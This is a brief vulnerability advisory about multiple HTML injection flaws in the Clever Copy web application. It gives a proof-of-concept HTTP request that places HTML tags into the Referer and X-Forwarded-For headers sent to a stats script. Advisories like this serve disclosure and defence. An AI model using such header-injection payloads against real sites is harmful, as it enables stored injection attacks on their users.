Clever Copy Multiple HTML Injection Vulnerabilities

Clever Copy Multiple HTML Injection Vulnerabilities

An exploit is not required.

The following proof of concept is available:

GET /path//stats/script.php? image=1&javascript=false HTTP/1.0
Host: host
Referer: http://www.example.com/path/index.php<HTML>
X-Forwarded-For: anyIP<HTML>